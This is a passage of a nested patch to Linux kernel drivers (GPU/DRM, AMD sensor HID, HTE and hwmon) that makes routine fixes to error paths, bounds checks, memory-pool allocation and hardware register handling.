+diff --git a/drivers/gpu/drm/lima/lima_drv.c b/drivers/gpu/drm/lima/lima_drv.c
+index 7b8d7178d09aa..39cab4a55f572 100644
+--- a/drivers/gpu/drm/lima/lima_drv.c
++++ b/drivers/gpu/drm/lima/lima_drv.c
+@@ -392,8 +392,10 @@ static int lima_pdev_probe(struct platform_device *pdev)
+ 
+ 	/* Allocate and initialize the DRM device. */
+ 	ddev = drm_dev_alloc(&lima_drm_driver, &pdev->dev);
+-	if (IS_ERR(ddev))
+-		return PTR_ERR(ddev);
++	if (IS_ERR(ddev)) {
++		err = PTR_ERR(ddev);
++		goto err_out0;
++	}
+ 
+ 	ddev->dev_private = ldev;
+ 	ldev->ddev = ddev;
+diff --git a/drivers/gpu/drm/mediatek/mtk_dp.c b/drivers/gpu/drm/mediatek/mtk_dp.c
+index 9d085c05c49c3..007af69e5026f 100644
+--- a/drivers/gpu/drm/mediatek/mtk_dp.c
++++ b/drivers/gpu/drm/mediatek/mtk_dp.c
+@@ -806,10 +806,9 @@ static int mtk_dp_aux_wait_for_completion(struct mtk_dp *mtk_dp, bool is_read)
+ }
+ 
+ static int mtk_dp_aux_do_transfer(struct mtk_dp *mtk_dp, bool is_read, u8 cmd,
+-				  u32 addr, u8 *buf, size_t length)
++				  u32 addr, u8 *buf, size_t length, u8 *reply_cmd)
+ {
+ 	int ret;
+-	u32 reply_cmd;
+ 
+ 	if (is_read && (length > DP_AUX_MAX_PAYLOAD_BYTES ||
+ 			(cmd == DP_AUX_NATIVE_READ && !length)))
+@@ -841,10 +840,10 @@ static int mtk_dp_aux_do_transfer(struct mtk_dp *mtk_dp, bool is_read, u8 cmd,
+ 	/* Wait for feedback from sink device. */
+ 	ret = mtk_dp_aux_wait_for_completion(mtk_dp, is_read);
+ 
+-	reply_cmd = mtk_dp_read(mtk_dp, MTK_DP_AUX_P0_3624) &
+-		    AUX_RX_REPLY_COMMAND_AUX_TX_P0_MASK;
++	*reply_cmd = mtk_dp_read(mtk_dp, MTK_DP_AUX_P0_3624) &
++		     AUX_RX_REPLY_COMMAND_AUX_TX_P0_MASK;
+ 
+-	if (ret || reply_cmd) {
++	if (ret) {
+ 		u32 phy_status = mtk_dp_read(mtk_dp, MTK_DP_AUX_P0_3628) &
+ 				 AUX_RX_PHY_STATE_AUX_TX_P0_MASK;
+ 		if (phy_status != AUX_RX_PHY_STATE_AUX_TX_P0_RX_IDLE) {
+@@ -1823,7 +1822,8 @@ static irqreturn_t mtk_dp_hpd_event_thread(int hpd, void *dev)
+ 	spin_unlock_irqrestore(&mtk_dp->irq_thread_lock, flags);
+ 
+ 	if (status & MTK_DP_THREAD_CABLE_STATE_CHG) {
+-		drm_helper_hpd_irq_event(mtk_dp->bridge.dev);
++		if (mtk_dp->bridge.dev)
++			drm_helper_hpd_irq_event(mtk_dp->bridge.dev);
+ 
+ 		if (!mtk_dp->train_info.cable_plugged_in) {
+ 			mtk_dp_disable_sdp_aui(mtk_dp);
+@@ -2070,7 +2070,7 @@ static ssize_t mtk_dp_aux_transfer(struct drm_dp_aux *mtk_aux,
+ 		ret = mtk_dp_aux_do_transfer(mtk_dp, is_read, request,
+ 					     msg->address + accessed_bytes,
+ 					     msg->buffer + accessed_bytes,
+-					     to_access);
++					     to_access, &msg->reply);
+ 
+ 		if (ret) {
+ 			drm_info(mtk_dp->drm_dev,
+@@ -2080,7 +2080,6 @@ static ssize_t mtk_dp_aux_transfer(struct drm_dp_aux *mtk_aux,
+ 		accessed_bytes += to_access;
+ 	} while (accessed_bytes < msg->size);
+ 
+-	msg->reply = DP_AUX_NATIVE_REPLY_ACK | DP_AUX_I2C_REPLY_ACK;
+ 	return msg->size;
+ err:
+ 	msg->reply = DP_AUX_NATIVE_REPLY_NACK | DP_AUX_I2C_REPLY_NACK;
+diff --git a/drivers/gpu/drm/msm/adreno/a5xx_gpu.c b/drivers/gpu/drm/msm/adreno/a5xx_gpu.c
+index 4f0dbeebb79fb..02ff306f96f42 100644
+--- a/drivers/gpu/drm/msm/adreno/a5xx_gpu.c
++++ b/drivers/gpu/drm/msm/adreno/a5xx_gpu.c
+@@ -1750,6 +1750,7 @@ struct msm_gpu *a5xx_gpu_init(struct drm_device *dev)
+ 	struct a5xx_gpu *a5xx_gpu = NULL;
+ 	struct adreno_gpu *adreno_gpu;
+ 	struct msm_gpu *gpu;
++	unsigned int nr_rings;
+ 	int ret;
+ 
+ 	if (!pdev) {
+@@ -1770,7 +1771,12 @@ struct msm_gpu *a5xx_gpu_init(struct drm_device *dev)
+ 
+ 	check_speed_bin(&pdev->dev);
+ 
+-	ret = adreno_gpu_init(dev, pdev, adreno_gpu, &funcs, 4);
++	nr_rings = 4;
++
++	if (adreno_is_a510(adreno_gpu))
++		nr_rings = 1;
++
++	ret = adreno_gpu_init(dev, pdev, adreno_gpu, &funcs, nr_rings);
+ 	if (ret) {
+ 		a5xx_destroy(&(a5xx_gpu->base.base));
+ 		return ERR_PTR(ret);
+diff --git a/drivers/gpu/drm/msm/adreno/adreno_device.c b/drivers/gpu/drm/msm/adreno/adreno_device.c
+index c5c4c93b3689c..cd009d56d35d5 100644
+--- a/drivers/gpu/drm/msm/adreno/adreno_device.c
++++ b/drivers/gpu/drm/msm/adreno/adreno_device.c
+@@ -438,9 +438,6 @@ struct msm_gpu *adreno_load_gpu(struct drm_device *dev)
+ 	 */
+ 	pm_runtime_enable(&pdev->dev);
+ 
+-	/* Make sure pm runtime is active and reset any previous errors */
+-	pm_runtime_set_active(&pdev->dev);
+-
+ 	ret = pm_runtime_get_sync(&pdev->dev);
+ 	if (ret < 0) {
+ 		pm_runtime_put_sync(&pdev->dev);
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder.c
+index 9c6817b5a1943..547f9f2b9fcb5 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder.c
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder.c
+@@ -654,7 +654,7 @@ static int dpu_encoder_virt_atomic_check(
+ 		if (drm_atomic_crtc_needs_modeset(crtc_state)) {
+ 			dpu_rm_release(global_state, drm_enc);
+ 
+-			if (!crtc_state->active_changed || crtc_state->active)
++			if (!crtc_state->active_changed || crtc_state->enable)
+ 				ret = dpu_rm_reserve(&dpu_kms->rm, global_state,
+ 						drm_enc, crtc_state, topology);
+ 		}
+diff --git a/drivers/gpu/drm/panel/panel-novatek-nt35950.c b/drivers/gpu/drm/panel/panel-novatek-nt35950.c
+index 3a844917da075..5d04957b1144f 100644
+--- a/drivers/gpu/drm/panel/panel-novatek-nt35950.c
++++ b/drivers/gpu/drm/panel/panel-novatek-nt35950.c
+@@ -593,8 +593,12 @@ static int nt35950_probe(struct mipi_dsi_device *dsi)
+ 		       DRM_MODE_CONNECTOR_DSI);
+ 
+ 	ret = drm_panel_of_backlight(&nt->panel);
+-	if (ret)
++	if (ret) {
++		if (num_dsis == 2)
++			mipi_dsi_device_unregister(nt->dsi[1]);
++
+ 		return dev_err_probe(dev, ret, "Failed to get backlight\n");
++	}
+ 
+ 	drm_panel_add(&nt->panel);
+ 
+@@ -610,6 +614,10 @@ static int nt35950_probe(struct mipi_dsi_device *dsi)
+ 
+ 		ret = mipi_dsi_attach(nt->dsi[i]);
+ 		if (ret < 0) {
++			/* If we fail to attach to either host, we're done */
++			if (num_dsis == 2)
++				mipi_dsi_device_unregister(nt->dsi[1]);
++
+ 			return dev_err_probe(dev, ret,
+ 					     "Cannot attach to DSI%d host.\n", i);
+ 		}
+diff --git a/drivers/gpu/drm/rcar-du/rcar_du_encoder.c b/drivers/gpu/drm/rcar-du/rcar_du_encoder.c
+index b1787be31e92c..7ecec7b04a8d0 100644
+--- a/drivers/gpu/drm/rcar-du/rcar_du_encoder.c
++++ b/drivers/gpu/drm/rcar-du/rcar_du_encoder.c
+@@ -109,8 +109,8 @@ int rcar_du_encoder_init(struct rcar_du_device *rcdu,
+ 	renc = drmm_encoder_alloc(&rcdu->ddev, struct rcar_du_encoder, base,
+ 				  &rcar_du_encoder_funcs, DRM_MODE_ENCODER_NONE,
+ 				  NULL);
+-	if (!renc)
+-		return -ENOMEM;
++	if (IS_ERR(renc))
++		return PTR_ERR(renc);
+ 
+ 	renc->output = output;
+ 
+diff --git a/drivers/gpu/drm/rockchip/rockchip_drm_gem.c b/drivers/gpu/drm/rockchip/rockchip_drm_gem.c
+index da8a69953706d..9426f7976d22e 100644
+--- a/drivers/gpu/drm/rockchip/rockchip_drm_gem.c
++++ b/drivers/gpu/drm/rockchip/rockchip_drm_gem.c
+@@ -261,9 +261,6 @@ static int rockchip_drm_gem_object_mmap(struct drm_gem_object *obj,
+ 	else
+ 		ret = rockchip_drm_gem_object_mmap_dma(obj, vma);
+ 
+-	if (ret)
+-		drm_gem_vm_close(vma);
+-
+ 	return ret;
+ }
+ 
+diff --git a/drivers/gpu/drm/ttm/ttm_pool.c b/drivers/gpu/drm/ttm/ttm_pool.c
+index 21b61631f73a1..86affe987a1cb 100644
+--- a/drivers/gpu/drm/ttm/ttm_pool.c
++++ b/drivers/gpu/drm/ttm/ttm_pool.c
+@@ -344,6 +344,65 @@ static unsigned int ttm_pool_page_order(struct ttm_pool *pool, struct page *p)
+ 	return p->private;
+ }
+ 
++/* Called when we got a page, either from a pool or newly allocated */
++static int ttm_pool_page_allocated(struct ttm_pool *pool, unsigned int order,
++				   struct page *p, dma_addr_t **dma_addr,
++				   unsigned long *num_pages,
++				   struct page ***pages)
++{
++	unsigned int i;
++	int r;
++
++	if (*dma_addr) {
++		r = ttm_pool_map(pool, order, p, dma_addr);
++		if (r)
++			return r;
++	}
++
++	*num_pages -= 1 << order;
++	for (i = 1 << order; i; --i, ++(*pages), ++p)
++		**pages = p;
++
++	return 0;
++}
++
++/**
++ * ttm_pool_free_range() - Free a range of TTM pages
++ * @pool: The pool used for allocating.
++ * @tt: The struct ttm_tt holding the page pointers.
++ * @caching: The page caching mode used by the range.
++ * @start_page: index for first page to free.
++ * @end_page: index for last page to free + 1.
++ *
++ * During allocation the ttm_tt page-vector may be populated with ranges of
++ * pages with different attributes if allocation hit an error without being
++ * able to completely fulfill the allocation. This function can be used
++ * to free these individual ranges.
++ */
++static void ttm_pool_free_range(struct ttm_pool *pool, struct ttm_tt *tt,
++				enum ttm_caching caching,
++				pgoff_t start_page, pgoff_t end_page)
++{
++	struct page **pages = tt->pages;
++	unsigned int order;
++	pgoff_t i, nr;
++
++	for (i = start_page; i < end_page; i += nr, pages += nr) {
++		struct ttm_pool_type *pt = NULL;
++
++		order = ttm_pool_page_order(pool, *pages);
++		nr = (1UL << order);
++		if (tt->dma_address)
++			ttm_pool_unmap(pool, tt->dma_address[i], nr);
++
++		pt = ttm_pool_select_type(pool, caching, order);
++		if (pt)
++			ttm_pool_type_give(pt, *pages);
++		else
++			ttm_pool_free_page(pool, caching, order, *pages);
++	}
++}
++
+ /**
+  * ttm_pool_alloc - Fill a ttm_tt object
+  *
+@@ -359,12 +418,14 @@ static unsigned int ttm_pool_page_order(struct ttm_pool *pool, struct page *p)
+ int ttm_pool_alloc(struct ttm_pool *pool, struct ttm_tt *tt,
+ 		   struct ttm_operation_ctx *ctx)
+ {
+-	unsigned long num_pages = tt->num_pages;
++	pgoff_t num_pages = tt->num_pages;
+ 	dma_addr_t *dma_addr = tt->dma_address;
+ 	struct page **caching = tt->pages;
+ 	struct page **pages = tt->pages;
++	enum ttm_caching page_caching;
+ 	gfp_t gfp_flags = GFP_USER;
+-	unsigned int i, order;
++	pgoff_t caching_divide;
++	unsigned int order;
+ 	struct page *p;
+ 	int r;
+ 
+@@ -385,45 +446,61 @@ int ttm_pool_alloc(struct ttm_pool *pool, struct ttm_tt *tt,
+ 	for (order = min_t(unsigned int, MAX_ORDER - 1, __fls(num_pages));
+ 	     num_pages;
+ 	     order = min_t(unsigned int, order, __fls(num_pages))) {
+-		bool apply_caching = false;
+ 		struct ttm_pool_type *pt;
+ 
++		page_caching = tt->caching;
+ 		pt = ttm_pool_select_type(pool, tt->caching, order);
+ 		p = pt ? ttm_pool_type_take(pt) : NULL;
+ 		if (p) {
+-			apply_caching = true;
+-		} else {
+-			p = ttm_pool_alloc_page(pool, gfp_flags, order);
+-			if (p && PageHighMem(p))
+-				apply_caching = true;
+-		}
+-
+-		if (!p) {
+-			if (order) {
+-				--order;
+-				continue;
+-			}
+-			r = -ENOMEM;
+-			goto error_free_all;
+-		}
+-
+-		if (apply_caching) {
+ 			r = ttm_pool_apply_caching(caching, pages,
+ 						   tt->caching);
+ 			if (r)
+ 				goto error_free_page;
+-			caching = pages + (1 << order);
++
++			caching = pages;
++			do {
++				r = ttm_pool_page_allocated(pool, order, p,
++							    &dma_addr,
++							    &num_pages,
++							    &pages);
++				if (r)
++					goto error_free_page;
++
++				caching = pages;
++				if (num_pages < (1 << order))
++					break;
++
++				p = ttm_pool_type_take(pt);
++			} while (p);
+ 		}
+ 
+-		if (dma_addr) {
+-			r = ttm_pool_map(pool, order, p, &dma_addr);
++		page_caching = ttm_cached;
++		while (num_pages >= (1 << order) &&
++		       (p = ttm_pool_alloc_page(pool, gfp_flags, order))) {
++
++			if (PageHighMem(p)) {
++				r = ttm_pool_apply_caching(caching, pages,
++							   tt->caching);
++				if (r)
++					goto error_free_page;
++				caching = pages;
++			}
++			r = ttm_pool_page_allocated(pool, order, p, &dma_addr,
++						    &num_pages, &pages);
+ 			if (r)
+ 				goto error_free_page;
++			if (PageHighMem(p))
++				caching = pages;
+ 		}
+ 
+-		num_pages -= 1 << order;
+-		for (i = 1 << order; i; --i)
+-			*(pages++) = p++;
++		if (!p) {
++			if (order) {
++				--order;
++				continue;
++			}
++			r = -ENOMEM;
++			goto error_free_all;
++		}
+ 	}
+ 
+ 	r = ttm_pool_apply_caching(caching, pages, tt->caching);
+@@ -433,15 +510,13 @@ int ttm_pool_alloc(struct ttm_pool *pool, struct ttm_tt *tt,
+ 	return 0;
+ 
+ error_free_page:
+-	ttm_pool_free_page(pool, tt->caching, order, p);
++	ttm_pool_free_page(pool, page_caching, order, p);
+ 
+ error_free_all:
+ 	num_pages = tt->num_pages - num_pages;
+-	for (i = 0; i < num_pages; ) {
+-		order = ttm_pool_page_order(pool, tt->pages[i]);
+-		ttm_pool_free_page(pool, tt->caching, order, tt->pages[i]);
+-		i += 1 << order;
+-	}
++	caching_divide = caching - tt->pages;
++	ttm_pool_free_range(pool, tt, tt->caching, 0, caching_divide);
++	ttm_pool_free_range(pool, tt, ttm_cached, caching_divide, num_pages);
+ 
+ 	return r;
+ }
+@@ -457,27 +532,7 @@ EXPORT_SYMBOL(ttm_pool_alloc);
+  */
+ void ttm_pool_free(struct ttm_pool *pool, struct ttm_tt *tt)
+ {
+-	unsigned int i;
+-
+-	for (i = 0; i < tt->num_pages; ) {
+-		struct page *p = tt->pages[i];
+-		unsigned int order, num_pages;
+-		struct ttm_pool_type *pt;
+-
+-		order = ttm_pool_page_order(pool, p);
+-		num_pages = 1ULL << order;
+-		if (tt->dma_address)
+-			ttm_pool_unmap(pool, tt->dma_address[i], num_pages);
+-
+-		pt = ttm_pool_select_type(pool, tt->caching, order);
+-		if (pt)
+-			ttm_pool_type_give(pt, tt->pages[i]);
+-		else
+-			ttm_pool_free_page(pool, tt->caching, order,
+-					   tt->pages[i]);
+-
+-		i += num_pages;
+-	}
++	ttm_pool_free_range(pool, tt, tt->caching, 0, tt->num_pages);
+ 
+ 	while (atomic_long_read(&allocated_pages) > page_pool_size)
+ 		ttm_pool_shrink();
+diff --git a/drivers/gpu/drm/vgem/vgem_fence.c b/drivers/gpu/drm/vgem/vgem_fence.c
+index c2a879734d407..e157541783959 100644
+--- a/drivers/gpu/drm/vgem/vgem_fence.c
++++ b/drivers/gpu/drm/vgem/vgem_fence.c
+@@ -249,4 +249,5 @@ void vgem_fence_close(struct vgem_file *vfile)
+ {
+ 	idr_for_each(&vfile->fence_idr, __vgem_fence_idr_fini, vfile);
+ 	idr_destroy(&vfile->fence_idr);
++	mutex_destroy(&vfile->fence_mutex);
+ }
+diff --git a/drivers/gpu/host1x/context.c b/drivers/gpu/host1x/context.c
+index b08cf11f9a661..047696432eb21 100644
+--- a/drivers/gpu/host1x/context.c
++++ b/drivers/gpu/host1x/context.c
+@@ -13,6 +13,11 @@
+ #include "context.h"
+ #include "dev.h"
+ 
++static void host1x_memory_context_release(struct device *dev)
++{
++	/* context device is freed in host1x_memory_context_list_free() */
++}
++
+ int host1x_memory_context_list_init(struct host1x *host1x)
+ {
+ 	struct host1x_memory_context_list *cdl = &host1x->context_list;
+@@ -53,28 +58,30 @@ int host1x_memory_context_list_init(struct host1x *host1x)
+ 		dev_set_name(&ctx->dev, "host1x-ctx.%d", i);
+ 		ctx->dev.bus = &host1x_context_device_bus_type;
+ 		ctx->dev.parent = host1x->dev;
++		ctx->dev.release = host1x_memory_context_release;
+ 
+ 		dma_set_max_seg_size(&ctx->dev, UINT_MAX);
+ 
+ 		err = device_add(&ctx->dev);
+ 		if (err) {
+ 			dev_err(host1x->dev, "could not add context device %d: %d\n", i, err);
+-			goto del_devices;
++			put_device(&ctx->dev);
++			goto unreg_devices;
+ 		}
+ 
+ 		err = of_dma_configure_id(&ctx->dev, node, true, &i);
+ 		if (err) {
+ 			dev_err(host1x->dev, "IOMMU configuration failed for context device %d: %d\n",
+ 				i, err);
+-			device_del(&ctx->dev);
+-			goto del_devices;
++			device_unregister(&ctx->dev);
++			goto unreg_devices;
+ 		}
+ 
+ 		fwspec = dev_iommu_fwspec_get(&ctx->dev);
+ 		if (!fwspec || !device_iommu_mapped(&ctx->dev)) {
+ 			dev_err(host1x->dev, "Context device %d has no IOMMU!\n", i);
+-			device_del(&ctx->dev);
+-			goto del_devices;
++			device_unregister(&ctx->dev);
++			goto unreg_devices;
+ 		}
+ 
+ 		ctx->stream_id = fwspec->ids[0] & 0xffff;
+@@ -82,11 +89,12 @@ int host1x_memory_context_list_init(struct host1x *host1x)
+ 
+ 	return 0;
+ 
+-del_devices:
++unreg_devices:
+ 	while (i--)
+-		device_del(&cdl->devs[i].dev);
++		device_unregister(&cdl->devs[i].dev);
+ 
+ 	kfree(cdl->devs);
++	cdl->devs = NULL;
+ 	cdl->len = 0;
+ 
+ 	return err;
+@@ -97,7 +105,7 @@ void host1x_memory_context_list_free(struct host1x_memory_context_list *cdl)
+ 	unsigned int i;
+ 
+ 	for (i = 0; i < cdl->len; i++)
+-		device_del(&cdl->devs[i].dev);
++		device_unregister(&cdl->devs[i].dev);
+ 
+ 	kfree(cdl->devs);
+ 	cdl->len = 0;
+diff --git a/drivers/hid/amd-sfh-hid/amd_sfh_pcie.c b/drivers/hid/amd-sfh-hid/amd_sfh_pcie.c
+index 47774b9ab3de0..c936d6a51c0cd 100644
+--- a/drivers/hid/amd-sfh-hid/amd_sfh_pcie.c
++++ b/drivers/hid/amd-sfh-hid/amd_sfh_pcie.c
+@@ -367,6 +367,14 @@ init_done:
+ 	return devm_add_action_or_reset(&pdev->dev, privdata->mp2_ops->remove, privdata);
+ }
+ 
++static void amd_sfh_shutdown(struct pci_dev *pdev)
++{
++	struct amd_mp2_dev *mp2 = pci_get_drvdata(pdev);
++
++	if (mp2 && mp2->mp2_ops)
++		mp2->mp2_ops->stop_all(mp2);
++}
++
+ static int __maybe_unused amd_mp2_pci_resume(struct device *dev)
+ {
+ 	struct amd_mp2_dev *mp2 = dev_get_drvdata(dev);
+@@ -401,6 +409,7 @@ static struct pci_driver amd_mp2_pci_driver = {
+ 	.id_table	= amd_mp2_pci_tbl,
+ 	.probe		= amd_mp2_pci_probe,
+ 	.driver.pm	= &amd_mp2_pm_ops,
++	.shutdown	= amd_sfh_shutdown,
+ };
+ module_pci_driver(amd_mp2_pci_driver);
+ 
+diff --git a/drivers/hid/amd-sfh-hid/sfh1_1/amd_sfh_desc.c b/drivers/hid/amd-sfh-hid/sfh1_1/amd_sfh_desc.c
+index 0609fea581c96..6f0d332ccf51c 100644
+--- a/drivers/hid/amd-sfh-hid/sfh1_1/amd_sfh_desc.c
++++ b/drivers/hid/amd-sfh-hid/sfh1_1/amd_sfh_desc.c
+@@ -218,7 +218,7 @@ static u8 get_input_rep(u8 current_index, int sensor_idx, int report_id,
+ 			     OFFSET_SENSOR_DATA_DEFAULT;
+ 		memcpy_fromio(&als_data, sensoraddr, sizeof(struct sfh_als_data));
+ 		get_common_inputs(&als_input.common_property, report_id);
+-		als_input.illuminance_value = als_data.lux;
++		als_input.illuminance_value = float_to_int(als_data.lux);
+ 		report_size = sizeof(als_input);
+ 		memcpy(input_report, &als_input, sizeof(als_input));
+ 		break;
+diff --git a/drivers/hid/amd-sfh-hid/sfh1_1/amd_sfh_init.c b/drivers/hid/amd-sfh-hid/sfh1_1/amd_sfh_init.c
+index a1d6e08fab7d4..bb8bd7892b674 100644
+--- a/drivers/hid/amd-sfh-hid/sfh1_1/amd_sfh_init.c
++++ b/drivers/hid/amd-sfh-hid/sfh1_1/amd_sfh_init.c
+@@ -112,6 +112,7 @@ static int amd_sfh1_1_hid_client_init(struct amd_mp2_dev *privdata)
+ 	cl_data->num_hid_devices = amd_sfh_get_sensor_num(privdata, &cl_data->sensor_idx[0]);
+ 	if (cl_data->num_hid_devices == 0)
+ 		return -ENODEV;
++	cl_data->is_any_sensor_enabled = false;
+ 
+ 	INIT_DELAYED_WORK(&cl_data->work, amd_sfh_work);
+ 	INIT_DELAYED_WORK(&cl_data->work_buffer, amd_sfh_work_buffer);
+@@ -170,6 +171,7 @@ static int amd_sfh1_1_hid_client_init(struct amd_mp2_dev *privdata)
+ 		status = (status == 0) ? SENSOR_ENABLED : SENSOR_DISABLED;
+ 
+ 		if (status == SENSOR_ENABLED) {
++			cl_data->is_any_sensor_enabled = true;
+ 			cl_data->sensor_sts[i] = SENSOR_ENABLED;
+ 			rc = amdtp_hid_probe(i, cl_data);
+ 			if (rc) {
+@@ -186,12 +188,21 @@ static int amd_sfh1_1_hid_client_init(struct amd_mp2_dev *privdata)
+ 					cl_data->sensor_sts[i]);
+ 				goto cleanup;
+ 			}
++		} else {
++			cl_data->sensor_sts[i] = SENSOR_DISABLED;
+ 		}
+ 		dev_dbg(dev, "sid 0x%x (%s) status 0x%x\n",
+ 			cl_data->sensor_idx[i], get_sensor_name(cl_data->sensor_idx[i]),
+ 			cl_data->sensor_sts[i]);
+ 	}
+ 
++	if (!cl_data->is_any_sensor_enabled) {
++		dev_warn(dev, "Failed to discover, sensors not enabled is %d\n",
++			 cl_data->is_any_sensor_enabled);
++		rc = -EOPNOTSUPP;
++		goto cleanup;
++	}
++
+ 	schedule_delayed_work(&cl_data->work_buffer, msecs_to_jiffies(AMD_SFH_IDLE_LOOP));
+ 	return 0;
+ 
+diff --git a/drivers/hid/amd-sfh-hid/sfh1_1/amd_sfh_interface.c b/drivers/hid/amd-sfh-hid/sfh1_1/amd_sfh_interface.c
+index c6df959ec7252..4f81ef2d4f56e 100644
+--- a/drivers/hid/amd-sfh-hid/sfh1_1/amd_sfh_interface.c
++++ b/drivers/hid/amd-sfh-hid/sfh1_1/amd_sfh_interface.c
+@@ -16,11 +16,11 @@ static int amd_sfh_wait_response(struct amd_mp2_dev *mp2, u8 sid, u32 cmd_id)
+ {
+ 	struct sfh_cmd_response cmd_resp;
+ 
+-	/* Get response with status within a max of 1600 ms timeout */
++	/* Get response with status within a max of 10000 ms timeout */
+ 	if (!readl_poll_timeout(mp2->mmio + AMD_P2C_MSG(0), cmd_resp.resp,
+ 				(cmd_resp.response.response == 0 &&
+ 				cmd_resp.response.cmd_id == cmd_id && (sid == 0xff ||
+-				cmd_resp.response.sensor_id == sid)), 500, 1600000))
++				cmd_resp.response.sensor_id == sid)), 500, 10000000))
+ 		return cmd_resp.response.response;
+ 
+ 	return -1;
+@@ -33,6 +33,7 @@ static void amd_start_sensor(struct amd_mp2_dev *privdata, struct amd_mp2_sensor
+ 	cmd_base.ul = 0;
+ 	cmd_base.cmd.cmd_id = ENABLE_SENSOR;
+ 	cmd_base.cmd.intr_disable = 0;
++	cmd_base.cmd.sub_cmd_value = 1;
+ 	cmd_base.cmd.sensor_id = info.sensor_idx;
+ 
+ 	writel(cmd_base.ul, privdata->mmio + AMD_C2P_MSG(0));
+@@ -45,6 +46,7 @@ static void amd_stop_sensor(struct amd_mp2_dev *privdata, u16 sensor_idx)
+ 	cmd_base.ul = 0;
+ 	cmd_base.cmd.cmd_id = DISABLE_SENSOR;
+ 	cmd_base.cmd.intr_disable = 0;
++	cmd_base.cmd.sub_cmd_value = 1;
+ 	cmd_base.cmd.sensor_id = sensor_idx;
+ 
+ 	writeq(0x0, privdata->mmio + AMD_C2P_MSG(1));
+@@ -56,8 +58,10 @@ static void amd_stop_all_sensor(struct amd_mp2_dev *privdata)
+ 	struct sfh_cmd_base cmd_base;
+ 
+ 	cmd_base.ul = 0;
+-	cmd_base.cmd.cmd_id = STOP_ALL_SENSORS;
++	cmd_base.cmd.cmd_id = DISABLE_SENSOR;
+ 	cmd_base.cmd.intr_disable = 0;
++	/* 0xf indicates all sensors */
++	cmd_base.cmd.sensor_id = 0xf;
+ 
+ 	writel(cmd_base.ul, privdata->mmio + AMD_C2P_MSG(0));
+ }
+diff --git a/drivers/hid/amd-sfh-hid/sfh1_1/amd_sfh_interface.h b/drivers/hid/amd-sfh-hid/sfh1_1/amd_sfh_interface.h
+index ae47a369dc05a..9d31d5b510eb4 100644
+--- a/drivers/hid/amd-sfh-hid/sfh1_1/amd_sfh_interface.h
++++ b/drivers/hid/amd-sfh-hid/sfh1_1/amd_sfh_interface.h
+@@ -33,9 +33,9 @@ struct sfh_cmd_base {
+ 		struct {
+ 			u32 sensor_id		: 4;
+ 			u32 cmd_id		: 4;
+-			u32 sub_cmd_id		: 6;
+-			u32 length		: 12;
+-			u32 rsvd		: 5;
++			u32 sub_cmd_id		: 8;
++			u32 sub_cmd_value	: 12;
++			u32 rsvd		: 3;
+ 			u32 intr_disable	: 1;
+ 		} cmd;
+ 	};
+@@ -133,7 +133,7 @@ struct sfh_mag_data {
+ 
+ struct sfh_als_data {
+ 	struct sfh_common_data commondata;
+-	u16 lux;
++	u32 lux;
+ };
+ 
+ struct hpd_status {
+diff --git a/drivers/hte/hte-tegra194-test.c b/drivers/hte/hte-tegra194-test.c
+index 5d776a185bd62..ce8c44e792213 100644
+--- a/drivers/hte/hte-tegra194-test.c
++++ b/drivers/hte/hte-tegra194-test.c
+@@ -6,6 +6,7 @@
+  */
+ 
+ #include <linux/err.h>
++#include <linux/mod_devicetable.h>
+ #include <linux/module.h>
+ #include <linux/moduleparam.h>
+ #include <linux/interrupt.h>
+diff --git a/drivers/hte/hte-tegra194.c b/drivers/hte/hte-tegra194.c
+index 49a27af22742b..d1b579c822797 100644
+--- a/drivers/hte/hte-tegra194.c
++++ b/drivers/hte/hte-tegra194.c
+@@ -251,7 +251,7 @@ static int tegra_hte_map_to_line_id(u32 eid,
+ {
+ 
+ 	if (m) {
+-		if (eid > map_sz)
++		if (eid >= map_sz)
+ 			return -EINVAL;
+ 		if (m[eid].slice == NV_AON_SLICE_INVALID)
+ 			return -EINVAL;
+diff --git a/drivers/hwmon/adt7475.c b/drivers/hwmon/adt7475.c
+index 6e4c92b500b8e..6a6ebcc896b1d 100644
+--- a/drivers/hwmon/adt7475.c
++++ b/drivers/hwmon/adt7475.c
+@@ -1604,9 +1604,9 @@ static int adt7475_set_pwm_polarity(struct i2c_client *client)
+ 	int ret, i;
+ 	u8 val;
+ 
+-	ret = of_property_read_u32_array(client->dev.of_node,
+-					 "adi,pwm-active-state", states,
+-					 ARRAY_SIZE(states));
++	ret = device_property_read_u32_array(&client->dev,
++					     "adi,pwm-active-state", states,
++					     ARRAY_SIZE(states));
+ 	if (ret)
+ 		return ret;
+ 
+diff --git a/drivers/hwmon/k10temp.c b/drivers/hwmon/k10temp.c
+index 5a9d47a229e40..be8bbb1c3a02d 100644
+--- a/drivers/hwmon/k10temp.c
++++ b/drivers/hwmon/k10temp.c
+@@ -75,6 +75,7 @@ static DEFINE_MUTEX(nb_smu_ind_mutex);
+ 
+ #define ZEN_CUR_TEMP_SHIFT			21
+ #define ZEN_CUR_TEMP_RANGE_SEL_MASK		BIT(19)
++#define ZEN_CUR_TEMP_TJ_SEL_MASK		GENMASK(17, 16)
+ 
+ struct k10temp_data {
+ 	struct pci_dev *pdev;
+@@ -155,7 +156,8 @@ static long get_raw_temp(struct k10temp_data *data)
+ 
+ 	data->read_tempreg(data->pdev, &regval);
+ 	temp = (regval >> ZEN_CUR_TEMP_SHIFT) * 125;
+-	if (regval & data->temp_adjust_mask)
++	if ((regval & data->temp_adjust_mask) ||
++	    (regval & ZEN_CUR_TEMP_TJ_SEL_MASK) == ZEN_CUR_TEMP_TJ_SEL_MASK)
+ 		temp -= 49000;
+ 	return temp;
+ }
+diff --git a/drivers/hwmon/pmbus/fsp-3y.c b/drivers/hwmon/pmbus/fsp-3y.c
+index aec294cc72d1f..c7469d2cdedcf 100644
+--- a/drivers/hwmon/pmbus/fsp-3y.c
++++ b/drivers/hwmon/pmbus/fsp-3y.c
+@@ -180,7 +180,6 @@ static struct pmbus_driver_info fsp3y_info[] = {
+ 			PMBUS_HAVE_FAN12,
+ 		.func[YM2151_PAGE_5VSB_LOG] =
+ 			PMBUS_HAVE_VOUT | PMBUS_HAVE_IOUT,
+-			PMBUS_HAVE_IIN,
+ 		.read_word_data = fsp3y_read_word_data,
+ 		.read_byte_data = fsp3y_read_byte_data,
+ 	},
+diff --git a/drivers/hwtracing/coresight/coresight-etm-perf.c b/drivers/hwtracing/coresight/coresight-etm-perf.c
